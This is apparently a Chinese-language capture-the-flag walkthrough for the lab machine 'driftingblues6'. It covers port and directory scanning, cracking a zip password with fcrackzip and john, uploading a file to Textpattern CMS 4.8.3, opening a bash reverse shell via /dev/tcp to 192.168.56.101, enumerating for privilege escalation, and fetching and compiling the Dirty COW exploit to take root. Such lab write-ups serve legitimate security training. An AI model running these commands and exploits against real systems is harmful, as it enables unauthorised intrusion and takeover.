driftingblues6
端口扫描
nmap -sT --min-rate 10000 -p- 192.168.56.120
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:8B:74:69 (Oracle VirtualBox virtual NIC)
web渗透
robots.txt

告诉我们进行目录爆破时,添加zip后缀,还有一个路径/textpattern/textpattern
gobuster dir -u http://192.168.56.120 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

发现压缩包有密码
┌──(root㉿kali)-[/tmp]
└─# fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt spammer.zip
PASSWORD FOUND!!!!: pw == myspace4
或者利用john进行破解
zip2john spammer.zip > hash
john hash -w=/usr/share/wordlists/rockyou.txt
得到一对凭据mayer:lionheart,可以登录网站了
发现是一个cms,知道了版本号
Textpattern CMS (v4.8.3)

看了一下,发现就是文件上传,自己利用一下吧

没有过滤,直接上传
路径是:http://192.168.56.120/textpattern/files/2.php
系统立足点
反弹shell即可
/bin/bash -i >& /dev/tcp/192.168.56.101/1234 0>&1
尝试提权
sudo -l
cat /etc/crontab
find / -perm -u=s -type f 2>/dev/null
getcap -r 2>/dev/null
find / -writable 2>/dev/null
uname -a
最后发现内核版本是

搜索找到exp
https://www.exploit-db.com/exploits/40839
脏牛提权
wget https://www.exploit-db.com/download/40839

上传到靶机,进行编译
gcc -o exp exp.c -lpthread -lcrypt

把root用户改成firefart,密码自己输入
